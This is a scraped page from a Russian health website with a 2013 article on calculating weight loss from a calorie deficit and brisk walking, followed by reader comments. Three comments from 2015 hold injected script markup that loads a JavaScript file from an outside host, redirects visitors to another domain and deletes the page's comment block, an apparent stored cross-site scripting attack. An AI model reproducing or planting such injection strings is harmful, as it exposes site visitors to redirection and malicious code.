Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Математика на помощь худе...  >>  Математика на помощь худеющим
 
Обратная связь
 

Математика на помощь худеющим

Размер шрифта
31 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Из нашей статьи вы узнаете, как рассчитать предполагаемую потерю веса в зависимости от физической активности и калорийности пищи.

Удовольствие от съеденной конфеты длится всего несколько минут, зато на сжигание калорий, которые в ней содержатся, вам потребуется примерно 45 минут.

Для того чтобы сбросить полкилограмма, нужно сжечь примерно 3 500 калорий, а для этого необходимо тренироваться в течение нескольких дней. Эффективное снижение веса должно включать не только физическую активность, но и ограничение калорийности пищи. 

Хотя сами по себе физические упражнения позволяют снизить вес быстрее, максимальной эффективности удается достичь только при ограничении калорийности пищи. Подобная стратегия позволяет увеличить скорость сжигания калорий даже в те моменты, когда вы не занимаетесь.

Приступим к расчетам

Для начала возьмем цифру 3 500 – именно такое количество калорий содержится в 500 граммах жировой ткани нашего организма. Используя эту цифру, вы сможете рассчитать, сколько сбросите, занимаясь спортом и ограничивая калорийность пищи.

1. Ходьба или бег трусцой позволяет сжигать примерно 100 калорий на каждые 1,5 километра (точное количество калорий зависит от ряда факторов, в том числе от веса и скорости движения). Таким образом, вы сможете сбросить полкилограмма, пройдя 52 километра (при условии, что вы правильно питаетесь и поддерживаете постоянный уровень физической активности).

2. Быстрая ходьба (со скоростью 6 км/ч) в течение 30 минут 5 дней в неделю позволит вам пройти 15 километров в неделю. Это означает, что полкилограмма вам удастся сбросить за 3,5 недели (при условии, что калорийность пищи будет постоянной).

3. Изменение рациона питания и уменьшение калорийности пищи на 250 калорий в день (полпорции мороженого или два сладких газированных напитка) позволит вам сбросить полкилограмма за две недели.

4. Уменьшение калорийности пищи на 250 калорий в день и ежедневная ходьба в течение 30 минут позволят сбросить полкилограмма за неделю. Чем ниже будет калорийность пищи, и чем больше вы будете ходить, тем лучше будет результат.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Как похудеть ничего не делая?
Худшие советы для похудения. Часть 3
Стали ли вы жертвой худших советов для похудения?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.